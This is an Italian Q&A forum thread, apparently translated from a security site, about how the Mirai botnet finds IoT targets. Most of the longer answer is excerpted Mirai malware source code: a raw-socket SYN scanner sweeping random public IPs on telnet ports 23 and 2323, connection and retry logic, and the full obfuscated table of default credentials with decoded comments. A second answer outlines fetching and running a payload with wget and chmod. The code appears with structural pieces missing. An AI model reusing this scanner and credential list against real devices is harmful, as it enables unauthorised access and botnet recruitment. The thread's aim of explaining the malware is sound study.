Come Mirai esegue la scansione o trova gli obiettivi [duplicati]


Ho letto alcuni articoli sulla botnet Mirai . Non riesco a capire come Mirai analizza / trova i dispositivi IoT. Mirai esegue la scansione dell'intero intervallo IP pubblico con una porta telnet aperta e tenta di accedere?

posta Danny 15.04.2017 - 16:06

2 risposte


L'originale Mirai cerca dispositivi con busybox installata. Questa risposta è diretta al Mirai originale. Come saprai, i i codici sorgente Mirai sono ora pubblici e non lo sono sorprendente vedere le varianti di Mirai in the wild che eseguono attacchi diversi se non più sofisticati.

Se ti piace sapere come Mirai comunica con la sua C & C. Consulta la domanda simile "Come comunica il C & C di Mirai con i suoi bot? ".

Ecco invece la spiegazione su "Come Mirai Targets".

  1. La scansione SYN sul socket viene eseguita e attraversando diversi indirizzi IP di destinazione. È usato perché è veloce e consente di sondare più porte

    // Set up raw socket scanning and payload
    if ((rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
    #ifdef DEBUG
        printf("[scanner] Failed to initialize raw socket, cannot scan\n");
  2. Ottenere risposte

        if (fake_time != last_spew)
            last_spew = fake_time;
            for (i = 0; i < SCANNER_RAW_PPS; i++)
                struct sockaddr_in paddr = {0};
                struct iphdr *iph = (struct iphdr *)scanner_rawpkt;
                struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
                iph->id = rand_next();
                iph->saddr = LOCAL_ADDR;
                iph->daddr = get_random_ip();
                iph->check = 0;
                iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
                if (i % 10 == 0)
                    tcph->dest = htons(2323);
                    tcph->dest = htons(23);
                tcph->seq = iph->daddr;
                tcph->check = 0;
                tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr)), sizeof (struct tcphdr));
                paddr.sin_family = AF_INET;
                paddr.sin_addr.s_addr = iph->daddr;
                paddr.sin_port = tcph->dest;
                sendto(rsck, scanner_rawpkt, sizeof (scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof (paddr));

    E ottenere un IP casuale a destinazione

    static ipv4_t get_random_ip(void)
    uint32_t tmp;
    uint8_t o1, o2, o3, o4;
        tmp = rand_next();
        o1 = tmp & 0xff;
        o2 = (tmp >> 8) & 0xff;
        o3 = (tmp >> 16) & 0xff;
        o4 = (tmp >> 24) & 0xff;
    while (o1 == 127 ||                             //      - Loopback
          (o1 == 0) ||                              //        - Invalid address space
          (o1 == 3) ||                              //        - General Electric Company
          (o1 == 15 || o1 == 16) ||                 //       - Hewlett-Packard Company
          (o1 == 56) ||                             //       - US Postal Service
          (o1 == 10) ||                             //       - Internal network
          (o1 == 192 && o2 == 168) ||               //   - Internal network
          (o1 == 172 && o2 >= 16 && o2 < 32) ||     //    - Internal network
          (o1 == 100 && o2 >= 64 && o2 < 127) ||    //    - IANA NAT reserved
          (o1 == 169 && o2 > 254) ||                //   - IANA NAT reserved
          (o1 == 198 && o2 >= 18 && o2 < 20) ||     //    - IANA Special use
          (o1 >= 224) ||                            // 224.*.*.*+       - Multicast
          (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
    return INET_ADDR(o1,o2,o3,o4);
  3. Invia pacchetto ACK e ricevi la risposta dalla destinazione ed esegui l'analisi se una porta è aperta. Targeting TCP / 23 e TCP / 2323

    last_avail_conn = 0;
    while (TRUE)
    int n;
    char dgram[1514];
    struct iphdr *iph = (struct iphdr *)dgram;
    struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
    struct scanner_connection *conn;
    errno = 0;
    n = recvfrom(rsck, dgram, sizeof (dgram), MSG_NOSIGNAL, NULL, NULL);
    if (n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)
    if (n < sizeof(struct iphdr) + sizeof(struct tcphdr))
    if (iph->daddr != LOCAL_ADDR)
    if (iph->protocol != IPPROTO_TCP)
    if (tcph->source != htons(23) && tcph->source != htons(2323))
    if (tcph->dest != source_port)
    if (!tcph->syn)
    if (!tcph->ack)
    if (tcph->rst)
    if (tcph->fin)
    if (htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)
    conn = NULL;
    for (n = last_avail_conn; n < SCANNER_MAX_CONNS; n++)
        if (conn_table[n].state == SC_CLOSED)
            conn = &conn_table[n];
            last_avail_conn = n;
  4. Una volta finita. Una sessione TCP è quindi stabilita

        for (i = 0; i < SCANNER_MAX_CONNS; i++)
            int timeout;
            conn = &conn_table[i];
            timeout = (conn->state > SC_CONNECTING ? 30 : 5);
            if (conn->state != SC_CLOSED && (fake_time - conn->last_recv) > timeout)
    #ifdef DEBUG
                printf("[scanner] FD%d timed out (state = %d)\n", conn->fd, conn->state);
                conn->fd = -1;
                // Retry
                if (conn->state > SC_HANDLE_IACS) // If we were at least able to connect, try again
                    if (++(conn->tries) == 10)
                        conn->tries = 0;
                        conn->state = SC_CLOSED;
    #ifdef DEBUG
                        printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
                    conn->tries = 0;
                    conn->state = SC_CLOSED;
  5. Enumerazione password

            if (FD_ISSET(conn->fd, &fdset_rd))
                while (TRUE)
                    int ret;
                    if (conn->state == SC_CLOSED)
                    if (conn->rdbuf_pos == SCANNER_RDBUF_SIZE)
                        memmove(conn->rdbuf, conn->rdbuf + SCANNER_HACK_DRAIN, SCANNER_RDBUF_SIZE - SCANNER_HACK_DRAIN);
                        conn->rdbuf_pos -= SCANNER_HACK_DRAIN;
                    errno = 0;
                    ret = recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);
                    if (ret == 0)
    #ifdef DEBUG
                        printf("[scanner] FD%d connection gracefully closed\n", conn->fd);
                        errno = ECONNRESET;
                        ret = -1; // Fall through to closing connection below
                    if (ret == -1)
                        if (errno != EAGAIN && errno != EWOULDBLOCK)
    #ifdef DEBUG
                            printf("[scanner] FD%d lost connection\n", conn->fd);
                            conn->fd = -1;
                            // Retry
                            if (++(conn->tries) >= 10)
                                conn->tries = 0;
                                conn->state = SC_CLOSED;
    #ifdef DEBUG
                                printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
  6. Cerca di utilizzare password deboli e password predefinite.

    add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10);                     // root     xc3511
    add_auth_entry("\x50\x4D\x4D\x56", "\x54\x4B\x58\x5A\x54", 9);                          // root     vizxv
    add_auth_entry("\x50\x4D\x4D\x56", "\x43\x46\x4F\x4B\x4C", 8);                          // root     admin
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C", 7);                      // admin    admin
    add_auth_entry("\x50\x4D\x4D\x56", "\x1A\x1A\x1A\x1A\x1A\x1A", 6);                      // root     888888
    add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x4F\x4A\x46\x4B\x52\x41", 5);                  // root     xmhdipc
    add_auth_entry("\x50\x4D\x4D\x56", "\x46\x47\x44\x43\x57\x4E\x56", 5);                  // root     default
     add_auth_entry("\x50\x4D\x4D\x56", "\x48\x57\x43\x4C\x56\x47\x41\x4A", 5);              // root     juantech
    add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17\x14", 5);                      // root     123456
    add_auth_entry("\x50\x4D\x4D\x56", "\x17\x16\x11\x10\x13", 5);                          // root     54321
    add_auth_entry("\x51\x57\x52\x52\x4D\x50\x56", "\x51\x57\x52\x52\x4D\x50\x56", 5);      // support  support
    add_auth_entry("\x50\x4D\x4D\x56", "", 4);                                              // root     (none)
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51\x55\x4D\x50\x46", 4);          // admin    password
    add_auth_entry("\x50\x4D\x4D\x56", "\x50\x4D\x4D\x56", 4);                              // root     root
    add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17", 4);                          // root     12345
    add_auth_entry("\x57\x51\x47\x50", "\x57\x51\x47\x50", 3);                              // user     user
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "", 3);                                          // admin    (none)
    add_auth_entry("\x50\x4D\x4D\x56", "\x52\x43\x51\x51", 3);                              // root     pass
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C\x13\x10\x11\x16", 3);      // admin    admin1234
    add_auth_entry("\x50\x4D\x4D\x56", "\x13\x13\x13\x13", 3);                              // root     1111
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x51\x4F\x41\x43\x46\x4F\x4B\x4C", 3);          // admin    smcadmin
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x13\x13\x13", 2);                          // admin    1111
    add_auth_entry("\x50\x4D\x4D\x56", "\x14\x14\x14\x14\x14\x14", 2);                      // root     666666
    add_auth_entry("\x50\x4D\x4D\x56", "\x52\x43\x51\x51\x55\x4D\x50\x46", 2);              // root     password
    add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16", 2);                              // root     1234
    add_auth_entry("\x50\x4D\x4D\x56", "\x49\x4E\x54\x13\x10\x11", 1);                      // root     klv123
    add_auth_entry("\x63\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50", "\x4F\x47\x4B\x4C\x51\x4F", 1); // Administrator admin
    add_auth_entry("\x51\x47\x50\x54\x4B\x41\x47", "\x51\x47\x50\x54\x4B\x41\x47", 1);      // service  service
    add_auth_entry("\x51\x57\x52\x47\x50\x54\x4B\x51\x4D\x50", "\x51\x57\x52\x47\x50\x54\x4B\x51\x4D\x50", 1); // supervisor supervisor
    add_auth_entry("\x45\x57\x47\x51\x56", "\x45\x57\x47\x51\x56", 1);                      // guest    guest
    add_auth_entry("\x45\x57\x47\x51\x56", "\x13\x10\x11\x16\x17", 1);                      // guest    12345
    add_auth_entry("\x45\x57\x47\x51\x56", "\x13\x10\x11\x16\x17", 1);                      // guest    12345
    add_auth_entry("\x43\x46\x4F\x4B\x4C\x13", "\x52\x43\x51\x51\x55\x4D\x50\x46", 1);      // admin1   password
    add_auth_entry("\x43\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50", "\x13\x10\x11\x16", 1); // administrator 1234
    add_auth_entry("\x14\x14\x14\x14\x14\x14", "\x14\x14\x14\x14\x14\x14", 1);              // 666666   666666
    add_auth_entry("\x1A\x1A\x1A\x1A\x1A\x1A", "\x1A\x1A\x1A\x1A\x1A\x1A", 1);              // 888888   888888
    add_auth_entry("\x57\x40\x4C\x56", "\x57\x40\x4C\x56", 1);                              // ubnt     ubnt
    add_auth_entry("\x50\x4D\x4D\x56", "\x49\x4E\x54\x13\x10\x11\x16", 1);                  // root     klv1234
    add_auth_entry("\x50\x4D\x4D\x56", "\x78\x56\x47\x17\x10\x13", 1);                      // root     Zte521
    add_auth_entry("\x50\x4D\x4D\x56", "\x4A\x4B\x11\x17\x13\x1A", 1);                      // root     hi3518
    add_auth_entry("\x50\x4D\x4D\x56", "\x48\x54\x40\x58\x46", 1);                          // root     jvbzd
    add_auth_entry("\x50\x4D\x4D\x56", "\x43\x4C\x49\x4D", 4);                              // root     anko
    add_auth_entry("\x50\x4D\x4D\x56", "\x58\x4E\x5A\x5A\x0C", 1);                          // root     zlxx.
    add_auth_entry("\x50\x4D\x4D\x56", "\x15\x57\x48\x6F\x49\x4D\x12\x54\x4B\x58\x5A\x54", 1); // root     7ujMko0vizxv
    add_auth_entry("\x50\x4D\x4D\x56", "\x15\x57\x48\x6F\x49\x4D\x12\x43\x46\x4F\x4B\x4C", 1); // root     7ujMko0admin
    add_auth_entry("\x50\x4D\x4D\x56", "\x51\x5B\x51\x56\x47\x4F", 1);                      // root     system
    add_auth_entry("\x50\x4D\x4D\x56", "\x4B\x49\x55\x40", 1);                              // root     ikwb
    add_auth_entry("\x50\x4D\x4D\x56", "\x46\x50\x47\x43\x4F\x40\x4D\x5A", 1);              // root     dreambox
    add_auth_entry("\x50\x4D\x4D\x56", "\x57\x51\x47\x50", 1);                              // root     user
    add_auth_entry("\x50\x4D\x4D\x56", "\x50\x47\x43\x4E\x56\x47\x49", 1);                  // root     realtek
    add_auth_entry("\x50\x4D\x4D\x56", "\x12\x12\x12\x12\x12\x12\x12\x12", 1);              // root     00000000
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x13\x13\x13\x13\x13\x13", 1);              // admin    1111111
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16", 1);                          // admin    1234
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16\x17", 1);                      // admin    12345
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x17\x16\x11\x10\x13", 1);                      // admin    54321
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16\x17\x14", 1);                  // admin    123456
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x15\x57\x48\x6F\x49\x4D\x12\x43\x46\x4F\x4B\x4C", 1); // admin    7ujMko0admin
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x16\x11\x10\x13", 1);                          // admin    1234
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51", 1);                          // admin    pass
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x4F\x47\x4B\x4C\x51\x4F", 1);                  // admin    meinsm
    add_auth_entry("\x56\x47\x41\x4A", "\x56\x47\x41\x4A", 1);                              // tech     tech
    add_auth_entry("\x4F\x4D\x56\x4A\x47\x50", "\x44\x57\x41\x49\x47\x50", 1);              // mother   f**ker
risposta data 15.04.2017 - 21:01

Non ho studiato molto su Mirai, ma un malware simile viene installato scansionando l'intero Internet per i router con uno scanner per le porte telnet aperte e forzandolo con password predefinite.

Dopo di ciò usa solo una combinazione di "wget", "chmod" e "./" per eseguire il payload sulla macchina target, nel caso di Mirai, router.

risposta data 15.04.2017 - 16:16

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